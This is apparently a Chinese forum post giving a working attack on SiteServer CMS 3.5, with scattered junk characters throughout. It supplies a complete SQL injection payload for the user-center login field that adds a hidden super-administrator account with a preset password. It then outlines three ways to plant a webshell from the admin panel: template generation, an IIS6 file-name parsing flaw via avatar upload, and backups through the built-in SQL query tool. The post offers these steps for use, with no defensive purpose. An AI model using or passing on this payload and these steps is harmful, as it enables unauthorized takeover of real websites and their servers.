经测试秒杀最新的3.5版
) W/ V, W5 w# bstieserver官网:www.siteserver.cn
+ L. D# A" e4 g; o* `& qEXP:, m, N" T6 K& L) D
直接访问UserCenter/login.aspx% H2 s! g' j, E% W! v) R
用户名处输入:! _2 D5 S2 h" g8 e# I
- b% I6 H- l8 E4 A( o$ }; J
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–- S+ J0 g$ |' x, w9 m4 f
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。. e! R" V% m) L2 G9 {! Q5 P
之后再访问后台SiteServer/login.aspx用插入的用户登陆
+ H; ^. h2 n! j7 P& \1 w后台拿webshell的三种方法:( q3 M9 o( W, f# M% W
一、
n* |( \ u' g6 Y3 x9 k; ^' F站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx! T- V; S! w2 `6 [4 O0 w
二、
8 E# F/ c" _0 P1 z4 ?( E成员权限-》添加用户-》用户名为:1.asp/ w" T+ r' C3 ]1 t5 G* h
http://127.0.0.1/usercenter/( n2 S3 K. ?, B6 `9 I
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell; E3 z. q, c2 A- K9 @& D4 M, s4 ~% i
(ps:后台添加用户时不会验证是否含有非法字符)+ o; }+ u8 m) r% |! d) I
三、2 z2 j2 p. C! n- x
系统工具-》实用工具-》机器参数查看
1 p I* X# q8 L4 f- w7 M可以看到数据库类型、名称,WEB路径+ z0 t8 k4 }( ]- w- f; g; ~
系统工具-》数据库工具-》SQL语句查询, t/ ?/ n% s9 j' I- u1 J7 K* }
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |